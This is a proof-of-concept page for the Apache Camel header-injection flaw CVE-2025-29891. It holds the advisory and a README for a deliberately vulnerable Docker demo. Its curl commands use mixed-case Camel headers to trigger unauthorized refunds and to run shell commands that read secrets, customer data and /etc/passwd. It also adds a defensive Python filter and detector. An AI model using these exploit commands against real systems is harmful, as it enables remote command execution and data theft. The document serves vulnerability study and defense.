
CVE-2025-29891 PoC — Apache Camel: Camel Message Header Injection through request parameters

Associated Vulnerability

Title: Apache Camel: Camel Message Header Injection through request parameters (CVE-2025-29891)

Description: Bypass/Injection vulnerability in Apache Camel. This issue affects Apache Camel: from 4.10.0 before 4.10.2, from 4.8.0 before 4.8.5, from 3.10.0 before 3.22.4. Users are recommended to upgrade to version 4.10.2 for 4.10.x LTS, 4.8.5 for 4.8.x LTS and 3.22.4 for 3.x releases. This vulnerability is present in Camel's default incoming header filter, which allows an attacker to include Camel-specific headers that, for some Camel components, can alter behaviour, such as the camel-bean component or the camel-exec component. If you have Camel applications that are directly connected to the internet via HTTP, then an attacker could include parameters in the HTTP requests sent to the Camel application that get translated into headers. The headers could be provided either as request parameters of an HTTP method invocation or as part of the payload of the HTTP method invocation. All the known Camel HTTP components, such as camel-servlet, camel-jetty, camel-undertow, camel-platform-http, and camel-netty-http, would be vulnerable out of the box. This CVE is related to CVE-2025-27636: while they have the same root cause and are fixed with the same fix, CVE-2025-27636 was assumed to only be exploitable if an attacker could add malicious HTTP headers, while we have now determined that it is also exploitable via HTTP parameters. As in CVE-2025-27636, exploitation is only possible if the Camel route uses particular vulnerable components.
Readme
# Apache Camel CVE Demonstration

This project demonstrates security vulnerabilities in Apache Camel related to header injection attacks.

## Docker Build

Build the Docker image:
```shell
docker build -t camel-cve-demo .
```

## Docker Run

Run the container with all necessary ports (PowerShell syntax: backtick line continuation and `${PWD}`):
```powershell
docker run -d `
  --name camel-cve-demo `
  -p 8080:8080 `
  -p 8081:8081 `
  -p 8484:8484 `
  -v ${PWD}/logs:/app/logs `
  -e JAVA_OPTS="-Xmx512m -Xms256m" `
  camel-cve-demo
```

## Attack Reproduction

### 1. Bean Method Injection Attack

Exploit the vulnerable endpoint by injecting a bean method name:

```shell
# Successful attack: the mixed-case name bypasses the case-sensitive header filter
curl.exe -X POST "http://localhost:8081/api/payment/callback" -H "cAmelBeanMethodName: processRefund" -d "order_id=ORD999&amount=9999.99"

# Alternative: the same name injected as a query parameter
curl.exe "http://localhost:8081/api/payment/callback?cAmelBeanMethodName=processRefund" -X POST -d "order_id=ORD999&amount=9999.99"
```

**Comparison (these should fail):**
```shell
# Lowercase prefix matches the default filter and is dropped - should not work
curl.exe -X POST "http://localhost:8081/api/payment/callback" -H "camelbeanmethodname: processRefund" -d "order_id=ORD999&amount=9999.99"

# Canonical case matches the default filter and is dropped - should not work
curl.exe -X POST "http://localhost:8081/api/payment/callback" -H "CamelBeanMethodName: processRefund" -d "order_id=ORD999&amount=9999.99"
```

### 2. Command Execution Attack

Exploit the exec component to execute arbitrary commands:

**Reconnaissance:**
```shell
# Check current directory
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: /bin/sh" -H "cAmelExecCommandArgs: -c pwd"

# List config directory
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: /bin/sh" -H "cAmelExecCommandArgs: -c ls -la /app/config/"

# Find configuration files
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: /bin/sh" -H "cAmelExecCommandArgs: -c find / -name database.conf 2>/dev/null"
```

**Data Exfiltration:**
```shell
# Read database configuration
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs: /etc/app/config/database.conf"

# Read payment secrets
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs: /app/secrets/payment.key"

# Read customer data
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs:/var/data/customers/customers.csv"

# Read audit logs
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs:/var/log/audit/audit.log"

# Read system users
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs:/etc/passwd"

# List processes
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: ps" -H "cAmelExecCommandArgs:aux"
```
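Both attacks above rely on the same root cause: the default incoming header filter compared names against the `Camel`/`camel` prefixes case-sensitively, so a mixed-case spelling passed through and, because Camel header lookup is case-insensitive, was then treated as the canonical header. The following added example (not part of this PoC or of Apache Camel's own code) models the vulnerable check beside the hardened one, applies both to the two injection vectors the CVE names (query parameters and headers), and flags mixed-case names in a request log line. The prefix list is an assumption based on the CVE text, and the sample request and log line are constructed.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Prefixes the default incoming filter strips (assumed from the CVE text; the
# exact list in Camel's DefaultHeaderFilterStrategy is not on this page).
CAMEL_PREFIXES = ("Camel", "camel", "org.apache.camel.")


def vulnerable_filter(name: str) -> bool:
    """Pre-fix behaviour: exact, case-sensitive prefix check. 'cAmelBeanMethodName'
    is not dropped, and since Camel header lookup ignores case it later acts as
    CamelBeanMethodName inside the route."""
    return name.startswith(CAMEL_PREFIXES)


def hardened_filter(name: str) -> bool:
    """Fixed behaviour: compare case-insensitively so every spelling of a
    Camel-internal name is dropped before a component can see it."""
    return name.lower().startswith(("camel", "org.apache.camel."))


def incoming_names(url: str, headers: dict) -> list:
    """Both vectors the CVE describes: query parameter names and header names."""
    params = [k for k, _ in parse_qsl(urlsplit(url).query, keep_blank_values=True)]
    return params + list(headers)


def scrub(names: list, is_internal) -> list:
    """Names that survive the given filter and reach the route."""
    return [n for n in names if not is_internal(n)]


# Matches any spelling of a Camel-prefixed name; canonical spellings are excluded
# below because the filter already drops those, so mixed case is the signal.
MIXED_CASE = re.compile(r"(?i)\b(camel[a-z]+|org\.apache\.camel\.[\w.]+)")


def detect_bypass(log_line: str) -> list:
    """Flag names in an access-log line that match a Camel prefix only ignoring case."""
    return [t for t in MIXED_CASE.findall(log_line) if not t.startswith(CAMEL_PREFIXES)]


# Constructed sample request mirroring the README's query-parameter PoC.
SAMPLE_URL = "http://localhost:8081/api/payment/callback?cAmelBeanMethodName=processRefund"
SAMPLE_HEADERS = {"Content-Type": "application/x-www-form-urlencoded", "cAmelExecCommandArgs": "-c id"}

if __name__ == "__main__":
    names = incoming_names(SAMPLE_URL, SAMPLE_HEADERS)
    print("reach route (vulnerable):", scrub(names, vulnerable_filter))
    print("reach route (hardened):  ", scrub(names, hardened_filter))
    print("flagged:", detect_bypass("POST /api/payment/callback?cAmelBeanMethodName=processRefund 200"))
```

Running `detect_bypass` over real access logs only covers the query-parameter vector; headers and POST bodies need a capture at the proxy or the application's own request logging.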

## Verify Attack Results

Check the attack logs inside the container:

```shell
# View unauthorized refund attempts
docker exec camel-cve-demo cat /tmp/unauthorized_refund.txt
```

## Ports

- **8080**: Main application (frontend)
- **8081**: Bean injection vulnerable endpoint
- **8484**: Exec injection vulnerable endpoint

File Snapshot

```text
[4.0K] /data/pocs/620e41d926ff063f4112bacfe2eba21e32acb783
├── [4.6K] Dockerfile
├── [4.1K] pom.xml
├── [3.3K] README.md
└── [4.0K] src
    └── [4.0K] main
        ├── [4.0K] java
        │   └── [4.0K] com
        │       └── [4.0K] example
        │           └── [4.0K] camel
        │               ├── [ 881] CamelCveDemoApplication.java
        │               ├── [4.0K] config
        │               │   ├── [1.5K] CamelConfig.java
        │               │   └── [ 903] CorsConfig.java
        │               ├── [4.0K] controller
        │               │   └── [ 523] WebController.java
        │               ├── [4.0K] routes
        │               │   ├── [5.9K] BeanRoute.java
        │               │   └── [6.5K] ExecRoute.java
        │               └── [4.0K] service
        │                   └── [6.1K] DemoService.java
        └── [4.0K] resources
            ├── [ 530] application.properties
            ├── [1.3K] logback-spring.xml
            └── [4.0K] static
                └── [ 11K] index.html

13 directories, 13 files
```